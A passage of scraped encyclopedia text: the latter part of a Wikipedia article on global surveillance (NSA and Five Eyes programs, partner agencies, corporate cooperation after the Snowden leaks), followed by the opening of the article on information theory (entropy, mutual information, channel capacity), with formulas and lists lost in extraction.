owners' relationships by correlating their patterns of movement over time with thousands or millions of other phone users who cross their paths.[49][50][51][52][53][54][55] In order to decode private conversations, the NSA has cracked the most commonly used cellphone encryption technology,A5/1. According to a classified document leaked by Snowden, the agency can "process encrypted A5/1" even when it has not acquired an encryption key.[56]In addition, the NSA uses various types of cellphone infrastructure, such as the links between carrier networks, to determine the location of a cellphone user tracked byVisitor Location Registers.[57] As worldwide sales ofsmartphonesgrew rapidly, the NSA decided to take advantage of the smartphone boom. This is particularly advantageous because the smartphone contains a variety of data sets that would interest an intelligence agency, such as social contacts, user behaviour, interests, location, photos andcredit cardnumbers and passwords.[58] According to the documents leaked by Snowden, the NSA has set uptask forcesassigned to several smartphone manufacturers andoperating systems, includingApple Inc.'siPhoneandiOSoperating system, as well asGoogle'sAndroidmobile operating system.[58]Similarly, Britain'sGCHQassigned a team to study and crack theBlackBerry.[58]In addition, there are smaller NSA programs, known as "scripts", that can perform surveillance on 38 different features of theiOS 3andiOS 4operating systems. These include themappingfeature,voicemailand photos, as well asGoogle Earth,FacebookandYahoo! Messenger.[58] In contrast to thePRISMsurveillance program, which is a front-door method of access that is nominally approved by theFISA court, theMUSCULARsurveillance program is noted to be "unusually aggressive" in its usage of unorthodox hacking methods to infiltrate Yahoo! and Googledata centresaround the world. As the program is operated overseas (United Kingdom), the NSA presumes that anyone using a foreign data link is a foreigner, and is, therefore, able to collect content and metadata on a previously unknown scale from U.S. citizens and residents.[59]According to the documents leaked by Snowden, the MUSCULAR surveillance program is jointly operated by the NSA and Britain'sGCHQagency.[60](SeeInternational cooperation.) TheFive Eyeshave made repeated attempts to spy on Internet users communicating in secret via the anonymity networkTor. Several of their clandestine operations involve the implantation of malicious code into the computers of anonymous Tor users who visit infected websites. In some cases, the NSA and GCHQ have succeeded in blocking access to the anonymous network, diverting Tor users to insecure channels. In other cases, the NSA and the GCHQ were able to uncover the identity of these anonymous users.[61][62][63][64][65][66][67][68][69] Under theRoyal Conciergesurveillance program, Britain's GCHQ agency uses an automated monitoring system to infiltrate thereservation systemsof at least 350 luxuryhotelsin many different parts of the world.[70]Other related surveillance programs involve the wiretapping of room telephones and fax machines used in targeted hotels, as well as the monitoring of computers, hooked up to the hotel network.[70] The U.S.National Security Agency(NSA), the U.S.Central Intelligence Agency(CIA), and Britain'sGovernment Communications Headquarters(GCHQ) have been conducting surveillance on the networks of many online games, includingmassively multiplayer online role-playing games(MMORPGs) such asWorld of Warcraft, as well asvirtual worldssuch asSecond Life, and theXboxgaming console.[71] According to the April 2013 summary of disclosures, the NSA defined its "intelligence priorities" on a scale of "1" (highest interest) to "5" (lowest interest).[26]It classified about 30 countries as "3rd parties", with whom it cooperates but also spies on: Other prominent targets included members and adherents of the Internet group known as "Anonymous",[26]as well as potential whistleblowers.[73]According to Snowden, the NSA targeted reporters who wrote critically about the government after 9/11.[74] As part of a joint operation with theCentral Intelligence Agency(CIA), the NSA deployed secret eavesdropping posts in eighty U.S. embassies and consulates worldwide.[75]The headquarters ofNATOwere also used by NSA experts to spy on the European Union.[76] In 2013, documents provided by Edward Snowden revealed that the followingintergovernmental organizations, diplomatic missions, and government ministries have been subjected to surveillance by the "Five Eyes": DuringWorld War II, theBRUSA Agreementwas signed by the governments of the United States and the United Kingdom for the purpose of intelligence sharing.[85]This was later formalized in theUKUSA Agreementof 1946 as asecret treaty. The full text of the agreement was released to the public on 25 June 2010.[86] Although the treaty was later revised to include other countries such as Denmark, Germany, Ireland, Norway, Turkey, and the Philippines,[86]most of the information sharing has been performed by the so-called "Five Eyes",[87]a term referring to the following English-speakingwestern democraciesand their respective intelligence agencies: Left:SEA-ME-WE 3, which runs across theAfro-Eurasiansupercontinentfrom Japan toNorthern Germany, is one of the most importantsubmarine cablesaccessed by the "Five Eyes". Singapore, a former British colony in the Asia-Pacific region (blue dot), plays a vital role in intercepting Internet and telecommunications traffic heading from Australia/Japan to Europe, and vice versa. An intelligence-sharing agreement between Singapore and Australia allows the rest of the "Five Eyes" to gain access toSEA-ME-WE 3.[88]Right:TAT-14, a telecommunications cable linking Europe with the United States, was identified as one of few assets of "Critical Infrastructure and Key Resources" of the US on foreign territory. In 2013, it was revealed that British officials "pressured a handful of telecommunications and Internet companies" to allow the British government to gain access toTAT-14.[89] According to the leaked documents, aside from the Five Eyes, most other Western countries have also participated in the NSA surveillance system and are sharing information with each other.[90]In the documents the NSA lists "approved SIGINT partners" which are partner countries in addition to the Five Eyes. Glenn Greenwald said that the "NSA often maintains these partnerships by paying its partner to develop certain technologies and engage in surveillance, and can thus direct how the spying is carried out." These partner countries are divided into two groups, "Second Parties" and "Third Parties". The Second Parties are doing comprehensive cooperation with the NSA, and the Third Parties are doing focused cooperation.[91][92]However, being a partner of the NSA does not automatically exempt a country from being targeted by the NSA itself. According to an internal NSA document leaked by Snowden, "We (the NSA) can, and often do, target the signals of most 3rd party foreign partners."[93] TheAustralian Signals Directorate(ASD), formerly known as the Defence Signals Directorate (DSD), shares information on Australian citizens with the other members of theUKUSA Agreement. According to a 2008Five Eyesdocument leaked by Snowden, data of Australian citizens shared with foreign countries include "bulk, unselected, unminimised metadata" as well as "medical, legal or religious information".[96] In close cooperation with other members of theFive Eyescommunity, the ASD runs secret surveillance facilities in many parts ofSoutheast Asiawithout the knowledge of Australian diplomats.[97]In addition, the ASD cooperates with theSecurity and Intelligence Division(SID) of theRepublic of Singaporein an international operation to intercept underwater telecommunications cables across theEastern Hemisphereand thePacific Ocean.[98] In March 2017 it was reported that, on advice from theFive Eyes intelligence alliance, more than 500 Iraqi and Syrian refugees, have been refused entry to Australia, in the last year.[99] TheCommunications Security Establishment Canada(CSEC) offers the NSA resources for advanced collection, processing, and analysis. It has set upcovertsites at the request of NSA.[100]The US-CanadaSIGNTrelationship dates back to a secret alliance formed duringWorld War II, and was formalized in 1949 under the CANUSA Agreement.[100] On behalf of the NSA, the CSEC opened secret surveillance facilities in 20 countries around the world.[101] As well, theCommunications Security Establishment Canadahas been revealed, following theglobal surveillance disclosuresto be engaging in surveillance on Wifi Hotspots of major Canadian Airports, collecting meta-data to use for engaging in surveillance on travelers, even days after their departure from said airports.[102] ThePolitiets Efterretningstjeneste(PET) of Denmark, a domestic intelligence agency, exchanges data with the NSA on a regular basis, as part of a secret agreement with the United States.[103]Being one of the "9-Eyes" of theUKUSA Agreement, Denmark's relationship with the NSA is closer than the NSA's relationship with Germany, Sweden, Spain, Belgium or Italy.[104] TheDirectorate-General for External Security(DGSE) of France maintains a close relationship with both the NSA and the GCHQ after discussions for increased cooperation began in November 2006.[105]By the early 2010s, the extent of cooperation in the joint interception of digital data by the DGSE and the NSA was noted to have increased dramatically.[105][106] In 2011, a formalmemorandumfor data exchange was signed by the DGSE and the NSA, which facilitated the transfer of millions ofmetadatarecords from the DGSE to the NSA.[107]From December 2012 to 8 January 2013, over 70 million metadata records were handed over to the NSA by French intelligence agencies.[107] TheBundesnachrichtendienst(BND) of Germany systematically transfers metadata from German intelligence sources to the NSA. In December 2012 alone, the BND provided the NSA with 500 million metadata records.[108]The NSA granted the Bundesnachrichtendienst access toX-Keyscore,[109]in exchange for the German surveillance programsMira4andVeras.[108] In early 2013,Hans-Georg Maaßen, President of the German domestic security agencyBundesamt für Verfassungsschutz(BfV), made several visits to the headquarters of the NSA. According toclassifieddocuments of the German government, Maaßen agreed to transfer all data records of persons monitored in Germany by the BfV viaXKeyscoreto the NSA.[110]In addition, the BfV works very closely with eight other U.S. government agencies, including theCIA.[111]UnderProject 6, which is jointly operated by the CIA, BfV, and BND, a massive database containing personal information such asphotos,license plate numbers,Internet search historiesand telephonemetadatawas developed to gain a better understanding of the social relationships of presumedjihadists.[112] In 2012, the BfV handed over 864data setsof personal information to the CIA, NSA and seven otherU.S. intelligence agencies. In exchange, the BND received data from U.S. intelligence agencies on 1,830 occasions. The newly acquired data was handed over to the BfV and stored in a domestically accessible system known asNADIS WN.[113] TheIsraeli SIGINT National Unit(ISNU) routinely receives raw, unfiltered data of U.S. citizens from the NSA. However, a secret NSA document leaked by Snowden revealed that U.S. government officials are explicitly exempted from such forms ofdata sharingwith the ISNU.[116]As stated in a memorandum detailing the rules of data sharing on U.S. citizens, the ISNU is obligated to: Destroy upon recognition any communication contained in rawSIGINTprovided by NSA that is either to or from an official of the U.S. government. "U.S. government officials" include officials of the Executive Branch (includingWhite House, Cabinet Departments, and independent agencies); theU.S. House of Representatives and Senate(members and staff); and the U.S. Federal Court system (including, but not limited to, theSupreme Court). According to the undated memorandum, the ground rules for intelligence sharing between the NSA and the ISNU were laid out in March 2009.[116]Under the data sharing agreement, the ISNU is allowed to retain the identities of U.S. citizens (excluding U.S. government officials) for up to a year.[116] In 2011, the NSA asked the Japanese government to intercept underwater fibre-optic cables carrying phone and Internet data in theAsia-Pacificregion. However, the Japanese government refused to comply.[117] Under the reign ofMuammar Gaddafi, the Libyan regime forged a partnership with Britain's secret serviceMI6and the U.S.Central Intelligence Agency(CIA) to obtain information about Libyan dissidents living in the United States and Canada. In exchange, Gaddafi allowed the Western democracies to use Libya as a base forextraordinary renditions.[118][119][120][121][122] TheAlgemene Inlichtingen en Veiligheidsdienst(AIVD) of the Netherlands has been receiving and storing data of Internet users gathered by U.S. intelligence sources such as the NSA'sPRISMsurveillance program.[123]During a meeting in February 2013, the AIVD and theMIVDbriefed the NSA on their attempts to hackInternet forumsand to collect the data of all users using a technology known asComputer Network Exploitation(CNE).[124] TheNorwegian Intelligence Service(NIS) has confirmed that data collected by the agency is "shared with the Americans".[125]Kjell Grandhagen, head of Norwegian military intelligence told reporters at a news conference that "We share this information with partners, and partners share with us ... We are talking about huge amounts of traffic data".[126] In cooperation with the NSA, the NIS has gained access to Russian targets in theKola Peninsulaand other civilian targets. In general, the NIS provides information to the NSA about "Politicians", "Energy" and "Armament".[127]Atop secretmemo of the NSA lists the following years as milestones of theNorway-United States of America SIGNT agreement, or NORUS Agreement: The NSA perceives the NIS as one of its most reliable partners. Both agencies also cooperate to crack the encryption systems of mutual targets. According to the NSA, Norway has made no objections to its requests.[128] TheDefence Ministry of Singaporeand itsSecurity and Intelligence Division(SID) have been secretly intercepting much of the fibre optic cable traffic passing through the Asian continent. In close cooperation with theAustralian Signals Directorate(ASD/DSD), Singapore's SID has been able to interceptSEA-ME-WE 3(Southeast Asia-Middle East-Western Europe 3) as well asSEA-ME-WE 4telecommunications cables.[98]Access to these international telecommunications channels is facilitated by Singapore's government-owned operator,SingTel.[98]Temasek Holdings, a multibillion-dollarsovereign wealth fundwith a majority stake in SingTel, has maintained close relations with the country's intelligence agencies.[98] Information gathered by theGovernment of Singaporeis transferred to theGovernment of Australiaas part of an intelligence sharing agreement. This allows the "Five Eyes" to maintain a "stranglehold on communications across theEastern Hemisphere".[88] In close cooperation with theCentro Nacional de Inteligencia(CNI), the NSA intercepted 60.5 million phone calls in Spain in a single month.[129][130] TheFörsvarets radioanstalt(FRA) of Sweden (codenamedSardines)[131]has allowed the "Five Eyes" to access underwater cables in theBaltic Sea.[131]On 5 December 2013,Sveriges Television(Swedish Television) revealed that the FRA has been conducting a clandestine surveillance operation targeting the internal politics of Russia. The operation was conducted on behalf of the NSA, which receives data handed over to it by the FRA.[132][133] According to documents leaked by Snowden, the FRA of Sweden has been granted access to the NSA's international surveillance programXKeyscore.[134] TheFederal Intelligence Service(NDB) of Switzerland exchanges information with the NSA regularly, on the basis of a secret agreement to circumvent domestic surveillance restrictions.[135][136]In addition, the NSA has been granted access to Swiss surveillance facilities inLeuk(cantonofValais) andHerrenschwanden(canton ofBern), which are part of the Swiss surveillance programOnyx.[135] According to the NDB, the agency maintains working relationships with about 100 international organizations. However, the NDB has denied any form of cooperation with the NSA.[137]Although the NSA does not have direct access to Switzerland'sOnyxsurveillance program, the Director of the NDB acknowledged that it is possible for other U.S. intelligence agencies to gain access to Switzerland's surveillance system.[137] The British government allowed the NSA to store personal data of British citizens.[138] UnderProject MINARET, anti-Vietnam Wardissidents in the United States were jointly targeted by the GCHQ and the NSA.[139][140] The CIA paysAT&Tmore than US$10 million a year to gain access to international phone records, including those of U.S. citizens.[142] The NSA'sForeign Affairs Directorateinteracts with foreign intelligence services and members of theFive Eyesto implement global surveillance.[143] The FBI acts as theliaisonbetween U.S. intelligence agencies andSilicon Valleygiants such asMicrosoft.[47] In the early 2010s, theDHSconducted a joint surveillance operation with the FBI to crack down on dissidents of theOccupy Wall Streetprotest movement.[144][145][146] The NSA supplies domestic intercepts to theDrug Enforcement Administration(DEA),Internal Revenue Service(IRS), and other law enforcement agencies, who use intercepted data to initiate criminal investigations against US citizens. Federal agents are instructed to "recreate" the investigative trail in order to "cover up" where the information originated.[33] Weeks after theSeptember 11 attacks, U.S. PresidentGeorge W. Bushsigned thePatriot Actto ensure no disruption in the government's ability to conduct global surveillance: This new law that I sign today will allow surveillance of all communications used byterrorists, includinge-mails, theInternetandcell phones. The Patriot Act was extended by U.S. PresidentBarack Obamain May 2011 to further extend the federal government's legal authority to conduct additional forms of surveillance such asroving wiretaps.[148] Over 70 percent of theUnited States Intelligence Community's budget is earmarked for payment to private firms.[149]According toForbesmagazine, the defense technology companyLockheed Martinis currently the US's biggest defense contractor, and it is destined to be the NSA's most powerful commercial partner and biggest contractor in terms of dollar revenue.[150] In a joint operation with the NSA, the American telecommunications corporationAT&ToperatesRoom 641Ain theSBC Communicationsbuilding inSan Franciscoto spy on Internet traffic.[151]The CIA paysAT&Tmore than US$10 million a year to gain access to international phone records, including those of U.S. citizens.[142] Projects developed byBooz Allen Hamiltoninclude theStrategic Innovation Groupto identifyterroriststhrough social media, on behalf of government agencies.[152]During thefiscal yearof 2013, Booz Allen Hamilton derived 99% of its income from the government, with the largest portion of its revenue coming from theU.S. Army.[152]In 2013, Booz Allen Hamilton was hailed byBloomberg Businessweekas "the World's Most Profitable Spy Organization".[153] British Telecommunications(code-namedRemedy[154]), a major supplier of telecommunications, granted Britain's intelligence agency GCHQ "unlimited access" to its network of undersea cables, according to documents leaked by Snowden.[154] The American multinational corporationMicrosofthelped the NSA to circumvent software encryption safeguards. It also allowed the federal government to monitor web chats on theOutlook.comportal.[47]In 2013, Microsoft worked with the FBI to allow the NSA to gain access to the company'scloud storage serviceSkyDrive.[47] The French telecommunications corporationOrange S.A.shares customer call data with the French intelligence agency DGSE, and the intercepted data is handed over to GCHQ.[155] RSA Securitywas paid US$10 million by the NSA to introduce acryptographicbackdoorin its encryption products.[156] Strategic Forecasting, Inc., more commonly known asStratfor, is a global intelligence company offering information to governments and private clients includingDow Chemical Company,Lockheed Martin,Northrop Grumman,Raytheon, theU.S. Department of Homeland Security, theU.S. Defense Intelligence Agency, and theU.S. Marine Corps.[157] The British telecommunications companyVodafone(code-namedGerontic[154]) granted Britain's intelligence agency GCHQ "unlimited access" to its network of undersea cables, according to documents leaked by Snowden.[154] In-Q-Tel, which receives more than US$56 million a year in government support,[158]is aventure capitalfirm that enables the CIA to invest inSilicon Valley.[158] Palantir Technologiesis adata miningcorporation with close ties to the FBI, NSA and CIA.[159][160] Based inPalo Alto, California, the company developed a data collection and analytical program known asPrism.[161][162] In 2011, it was revealed that the company conducted surveillance onGlenn Greenwald.[163][164] Several countries have evaded global surveillance by constructing secretbunkerfacilities deep below the Earth's surface.[165] Despite North Korea being a priority target, the NSA's internal documents acknowledged that it did not know much aboutKim Jong-unand his regime's intentions.[72] In October 2012, Iran's police chief Esmail Ahmadi Moghaddam alleged thatGoogleis not a search engine but "a spying tool" for Western intelligence agencies.[166]Six months later in April 2013, the country announced plans to introduce an "IslamicGoogle Earth" to evade global surveillance.[167] Libyaevaded surveillance by building "hardened and buried" bunkers at least 40 feet below ground level.[165] The global surveillance disclosure has caused tension in thebilateral relationsof the United States with several of its allies and economic partners as well as in its relationship with theEuropean Union. On 12 August 2013, President Obama announced the creation of an "independent" panel of "outside experts" to review the NSA's surveillance programs. The panel is due to be established by the Director of National Intelligence,James R. Clapper, who will consult and provide assistance to them.[168] According to a survey undertaken by the human rights groupPEN International, these disclosures have had achilling effecton American writers. Fearing the risk of being targeted by government surveillance, 28% of PEN's American members have curbed their usage of social media, and 16% haveself-censoredthemselves by avoiding controversial topics in their writings.[169]
https://en.wikipedia.org/wiki/Global_surveillance
Information theoryis the mathematical study of thequantification,storage, andcommunicationofinformation. The field was established and formalized byClaude Shannonin the 1940s,[1]though early contributions were made in the 1920s through the works ofHarry NyquistandRalph Hartley. It is at the intersection ofelectronic engineering,mathematics,statistics,computer science,neurobiology,physics, andelectrical engineering.[2][3] A key measure in information theory isentropy. Entropy quantifies the amount of uncertainty involved in the value of arandom variableor the outcome of arandom process. For example, identifying the outcome of afaircoin flip(which has two equally likely outcomes) provides less information (lower entropy, less uncertainty) than identifying the outcome from a roll of adie(which has six equally likely outcomes). Some other important measures in information theory aremutual information,channel capacity,error exponents, andrelative entropy. Important sub-fields of information theory includesource coding,algorithmic complexity theory,algorithmic information theoryandinformation-theoretic security. Applications of fundamental topics of information theory include source coding/data compression(e.g. forZIP files), and channel coding/error detection and correction(e.g. forDSL). Its impact has been crucial to the success of theVoyagermissions to deep space,[4]the invention of thecompact disc, the feasibility of mobile phones and the development of theInternetandartificial intelligence.[5][6][3]The theory has also found applications in other areas, includingstatistical inference,[7]cryptography,neurobiology,[8]perception,[9]signal processing,[2]linguistics, the evolution[10]and function[11]of molecular codes (bioinformatics),thermal physics,[12]molecular dynamics,[13]black holes,quantum computing,information retrieval,intelligence gathering,plagiarism detection,[14]pattern recognition,anomaly detection,[15]the analysis ofmusic,[16][17]art creation,[18]imaging systemdesign,[19]study ofouter space,[20]the dimensionality ofspace,[21]andepistemology.[22] Information theory studies the transmission, processing, extraction, and utilization ofinformation. Abstractly, information can be thought of as the resolution of uncertainty. In the case of communication of information over a noisy channel, this abstract concept was formalized in 1948 byClaude Shannonin a paper entitledA Mathematical Theory of Communication, in which information is thought of as a set of possible messages, and the goal is to send these messages over a noisy channel, and to have the receiver reconstruct the message with low probability of error, in spite of the channel noise. Shannon's main result, thenoisy-channel coding theorem, showed that, in the limit of many channel uses, the rate of information that is asymptotically achievable is equal to the channel capacity, a quantity dependent merely on the statistics of the channel over which the messages are sent.[8] Coding theory is concerned with finding explicit methods, calledcodes, for increasing the efficiency and reducing the error rate of data communication over noisy channels to near the channel capacity. These codes can be roughly subdivided into data compression (source coding) anderror-correction(channel coding) techniques. In the latter case, it took many years to find the methods Shannon's work proved were possible.[23][24] A third class of information theory codes arecryptographic algorithms(bothcodesandciphers). Concepts, methods and results from coding theory and information theory are widely used in cryptography andcryptanalysis,[25]such as theunit ban. The landmark eventestablishingthe discipline of information theory and bringing it to immediate worldwide attention was the publication of Claude E. Shannon's classic paper "A Mathematical Theory of Communication" in theBell System Technical Journalin July and October 1948. HistorianJames Gleickrated the paper as the most important development of 1948, noting that the paper was "even more profound and more fundamental" than thetransistor.[26]He came to be known as the "father of information theory".[27][28][29]Shannon outlined some of his initial ideas of information theory as early as 1939 in a letter toVannevar Bush.[29] Prior to this paper, limited information-theoretic ideas had been developed atBell Labs, all implicitly assuming events of equal probability.Harry Nyquist's 1924 paper,Certain Factors Affecting Telegraph Speed, contains a theoretical section quantifying "intelligence" and the "line speed" at which it can be transmitted by a communication system, giving the relationW=Klogm(recalling theBoltzmann constant), whereWis the speed of transmission of intelligence,mis the number of different voltage levels to choose from at each time step, andKis a constant.Ralph Hartley's 1928 paper,Transmission of Information, uses the wordinformationas a measurable quantity, reflecting the receiver's ability to distinguish onesequence of symbolsfrom any other, thus quantifying information asH= logSn=nlogS, whereSwas the number of possible symbols, andnthe number of symbols in a transmission. The unit of information was therefore thedecimal digit, which since has sometimes been called thehartleyin his honor as a unit or scale or measure of information.Alan Turingin 1940 used similar ideas as part of the statistical analysis of the breaking of the German second world warEnigmaciphers.[citation needed] Much of the mathematics behind information theory with events of different probabilities were developed for the field ofthermodynamicsbyLudwig BoltzmannandJ. Willard Gibbs. Connections between information-theoretic entropy and thermodynamic entropy, including the important contributions byRolf Landauerin the 1960s, are explored inEntropy in thermodynamics and information theory.[citation needed] In Shannon's revolutionary and groundbreaking paper, the work for which had been substantially completed at Bell Labs by the end of 1944, Shannon for the first time introduced the qualitative and quantitative model of communication as a statistical process underlying information theory, opening with the assertion: With it came the ideas of: Information theory is based onprobability theoryand statistics, wherequantified informationis usually described in terms of bits. Information theory often concerns itself with measures of information of the distributions associated with random variables. One of the most important measures is calledentropy, which forms the building block of many other measures. Entropy allows quantification of measure of information in a single random variable.[30]Another useful concept is mutual information defined on two random variables, which describes the measure of information in common between those variables, which can be used to describe their correlation. The former quantity is a property of the probability distribution of a random variable and gives a limit on the rate at which data generated by independent samples with the given distribution can be reliably compressed. The latter is a property of the joint distribution of two random variables, and is the maximum rate of reliable communication across a noisychannelin the limit of long block lengths, when the channel statistics are determined by the joint distribution. The choice of logarithmic base in the following formulae determines theunitof information entropy that is used. A common unit of information is the bit orshannon, based on thebinary logarithm. Other units include thenat, which is based on thenatural logarithm, and thedecimal digit, which is based on thecommon logarithm. In what follows, an expression of the formplogpis considered by convention to be equal to zero wheneverp= 0. This is justified becauselimp→0+plog⁡p=0{\displaystyle \lim _{p\rightarrow 0+}p\log p=0}for any logarithmic base. Based on theprobability mass functionof each source symbol to be communicated, the ShannonentropyH, in units of bits (per symbol), is given by wherepiis the probability of occurrence of thei-th possible value of the source symbol. This equation gives the entropy in the units of "bits" (per symbol) because it uses a logarithm of base 2, and this base-2 measure of entropy has sometimes been called theshannonin his honor. Entropy is also commonly computed using the natural logarithm (basee, whereeis Euler's number), which produces a measurement of entropy in nats per symbol and sometimes simplifies the analysis by avoiding the need to include extra constants in the formulas. Other bases are also possible, but less commonly used. For example, a logarithm of base28= 256will produce a measurement inbytesper symbol, and a logarithm of base 10 will produce a measurement in decimal digits (orhartleys) per symbol. Intuitively, the entropyHXof a discrete random variableXis a measure of the amount ofuncertaintyassociated with the value ofXwhen only its distribution is known. The entropy of a source that emits a sequence ofNsymbols that areindependent and identically distributed(iid) isN⋅Hbits (per message ofNsymbols). If the source data symbols are identically distributed but not independent, the entropy of a message of lengthNwill be less thanN⋅H. If one transmits 1000 bits (0s and 1s), and the value of each of these bits is known to the receiver (has a specific value with certainty) ahead of transmission, it is clear that no information is transmitted. If, however, each bit is independently equally likely to be 0 or 1, 1000 shannons of information (more often called bits) have been transmitted. Between these two extremes, information can be quantified as follows. IfX{\displaystyle \mathbb {X} }is the set of all messages{x1, ...,xn}thatXcould be, andp(x)is the probability of somex∈X{\displaystyle x\in \mathbb {X} }, then the entropy,H, ofXis defined:[31] (Here,I(x)is theself-information, which is the entropy contribution of an individual message, andEX{\displaystyle \mathbb {E} _{X}}is theexpected value.) A property of entropy is that it is maximized when all the messages in the message space are equiprobablep(x) = 1/n; i.e., most unpredictable, in which caseH(X) = logn. The special case of information entropy for a random variable with two outcomes is the binary entropy function, usually taken to the logarithmic base 2, thus having theshannon(Sh) as unit: Thejoint entropyof two discrete random variablesXandYis merely the entropy of their pairing:(X,Y). This implies that ifXandYareindependent, then their joint entropy is the sum of their individual entropies. For example, if(X,Y)represents the position of a chess piece—Xthe row andYthe column, then the joint entropy of the row of the piece and the column of the piece will be the entropy of the position of the piece. Despite similar notation, joint entropy should not be confused withcross-entropy. Theconditional entropyorconditional uncertaintyofXgiven random variableY(also called theequivocationofXaboutY) is the average conditional entropy overY:[32] Because entropy can be conditioned on a random variable or on that random variable being a certain value, care should be taken not to confuse these two definitions of conditional entropy, the former of which is in more common use. A basic property of this form of conditional entropy is that: Mutual informationmeasures the amount of information that can be obtained about one random variable by observing another. It is important in communication where it can be used to maximize the amount of information shared between sent and received signals. The mutual information ofXrelative toYis given by: whereSI(Specific mutual Information) is thepointwise mutual information. A basic property of the mutual information is that That is, knowingY, we can save an average ofI(X;Y)bits in encodingXcompared to not knowingY. Mutual information issymmetric: Mutual information can be expressed as the average Kullback–Leibler divergence (information gain) between theposterior probability distributionofXgiven the value ofYand theprior distributiononX: In other words, this is a measure of how much, on the average, the probability distribution onXwill change if we are given the value ofY. This is often recalculated as the divergence from the product of the marginal distributions to the actual joint distribution: Mutual information is closely related to thelog-likelihood ratio testin the context of contingency tables and themultinomial distributionand toPearson's χ2test: mutual information can be considered a statistic for assessing independence between a pair of variables, and has a well-specified asymptotic distribution. TheKullback–Leibler divergence(orinformation divergence,information gain, orrelative entropy) is a way of comparing two distributions: a "true"probability distribution⁠p(X){\displaystyle p(X)}⁠, and an arbitrary probability distribution⁠q(X){\displaystyle q(X)}⁠. If we compress data in a manner that assumes⁠q(X){\displaystyle q(X)}⁠is the distribution underlying some data, when, in reality,⁠p(X){\displaystyle p(X)}⁠is the correct distribution, the Kullback–Leibler divergence is the number of average additional bits per datum necessary for compression. It is thus defined Although it is sometimes used as a 'distance metric', KL divergence is not a truemetricsince it is not symmetric and does not satisfy thetriangle inequality(making it a semi-quasimetric). Another interpretation of the KL divergence is the "unnecessary surprise" introduced by a prior from the truth: suppose a numberXis about to be drawn randomly from a discrete set with probability distribution⁠p(x){\displaystyle p(x)}⁠. If Alice knows the true distribution⁠p(x){\displaystyle p(x)}⁠, while Bob believes (has aprior) that the distribution is⁠q(x){\displaystyle q(x)}⁠, then Bob will be moresurprisedthan Alice, on average, upon seeing the value ofX. The KL divergence is the (objective) expected value of Bob's (subjective)surprisalminus Alice's surprisal, measured in bits if thelogis in base 2. In this way, the extent to which Bob's prior is "wrong" can be quantified in terms of how "unnecessarily surprised" it is expected to make him. Directed information,I(Xn→Yn){\displaystyle I(X^{n}\to Y^{n})}, is an information theory measure that quantifies theinformationflow from the random processXn={X1,X2,…,Xn}{\displaystyle X^{n}=\{X_{1},X_{2},\dots ,X_{n}\}}to the random processYn={Y1,Y2,…,Yn}{\displaystyle Y^{n}=\{Y_{1},Y_{2},\dots ,Y_{n}\}}. The termdirected informationwas coined byJames Masseyand is defined as whereI(Xi;Yi|Yi−1){\displaystyle I(X^{i};Y_{i}|Y^{i-1})}is theconditional mutual informationI(X1,X2,...,Xi;Yi|Y1,Y2,...,Yi−1){\displaystyle I(X_{1},X_{2},...,X_{i};Y_{i}|Y_{1},Y_{2},...,Y_{i-1})}. In contrast tomutualinformation,directedinformation is not symmetric. TheI(Xn→Yn){\displaystyle I(X^{n}\to Y^{n})}measures the information bits that are transmitted causally[clarification needed]fromXn{\displaystyle X^{n}}toYn{\displaystyle Y^{n}}. The Directed information has many applications in problems wherecausalityplays an important role such ascapacity of channelwith feedback,[33][34]capacity of discretememorylessnetworks with feedback,[35]gamblingwith causal side information,[36]compressionwith causal side information,[37]real-time controlcommunication settings,[38][39]and in statistical physics.[40] Other important information theoretic quantities include theRényi entropyand theTsallis entropy(generalizations of the concept of entropy),differential entropy(a generalization of quantities of information to continuous distributions), and theconditional mutual information. Also,pragmatic informationhas been proposed as a measure of how much information has been used in making a decision. Coding theory is one of the most important and direct applications of information theory. It can be subdivided into source coding theory and channel coding theory. Using a statistical description for data, information theory quantifies the number of bits needed to describe the data, which is the information entropy of the source. This division of coding theory into compression and transmission is justified by the information transmission theorems, or source–channel separation theorems that justify the use of bits as the universal currency for information in many contexts. However, these theorems only hold in the situation where one transmitting user wishes to communicate to one receiving user. In scenarios with more than one transmitter (the multiple-access channel), more than one receiver (thebroadcast channel) or intermediary "helpers" (therelay channel), or more generalnetworks, compression followed by transmission may no longer be optimal. Any process that generates successive messages can be considered asourceof information. A memoryless source is one in which each message is anindependent identically distributed random variable, whereas the properties ofergodicityandstationarityimpose less restrictive constraints. All such sources arestochastic. These terms are well studied in their own right outside information theory. Informationrateis the average entropy per symbol. For memoryless sources, this is merely the entropy of each symbol, while, in the case of a stationary stochastic process, it is: that is, the conditional entropy of a symbol given all the previous symbols generated. For the more general case of a process that is not necessarily stationary, theaverage rateis: that is, the limit of the joint entropy per symbol. For stationary sources, these two expressions give the same result.[41] Theinformation rateis defined as: It is common in information theory to speak of the "rate" or "entropy" of a language. This is appropriate, for example, when the source of information is English prose. The rate of a source of information is related to its redundancy and how well it can be compressed, the subject ofsource coding. Communications over a channel is the primary motivation of information theory. However, channels often fail to produce exact reconstruction of a signal; noise, periods of silence, and other forms of signal corruption often degrade quality. Consider the communications process over a discrete channel. A simple model of the process is shown below: HereXrepresents the space of messages transmitted, andYthe space of messages received during a unit time over our channel. Letp(y|x)be theconditional probabilitydistribution function ofYgivenX. We will considerp(y|x)to be an inherent fixed property of our communications channel (representing the nature of thenoiseof our channel). Then the joint distribution ofXandYis completely determined by our channel and by our choice off(x), the marginal distribution of messages we choose to send over the channel. Under these constraints, we would like to maximize the rate of information, or thesignal, we can communicate over the channel. The appropriate measure for this is the mutual information, and this maximum mutual information is called thechannel capacityand is given by: This capacity has the following property related to communicating at information rateR(whereRis usually bits per symbol). For any information rateR<Cand coding errorε> 0, for large enoughN, there exists a code of lengthNand rate ≥ R and a decoding algorithm, such that the maximal probability of block error is ≤ε; that is, it is always possible to transmit with arbitrarily small block error. In addition, for any rateR>C, it is impossible to transmit with arbitrarily small block error. Channel codingis concerned with finding such nearly optimal codes that can be used to transmit data over a noisy channel with a small coding error at a rate near the channel capacity. In practice many channels have memory. Namely, at timei{\displaystyle i}the channel is given by the conditional probabilityP(yi|xi,xi−1,xi−2,...,x1,yi−1,yi−2,...,y1){\displaystyle P(y_{i}|x_{i},x_{i-1},x_{i-2},...,x_{1},y_{i-1},y_{i-2},...,y_{1})}. It is often more comfortable to use the notationxi=(xi,xi−1,xi−2,...,x1){\displaystyle x^{i}=(x_{i},x_{i-1},x_{i-2},...,x_{1})}and the channel becomeP(yi|xi,yi−1){\displaystyle P(y_{i}|x^{i},y^{i-1})}. In such a case the capacity is given by themutual informationrate when there is no feedback available and theDirected informationrate in the case that either there is feedback or not[33][42](if there is no feedback the directed 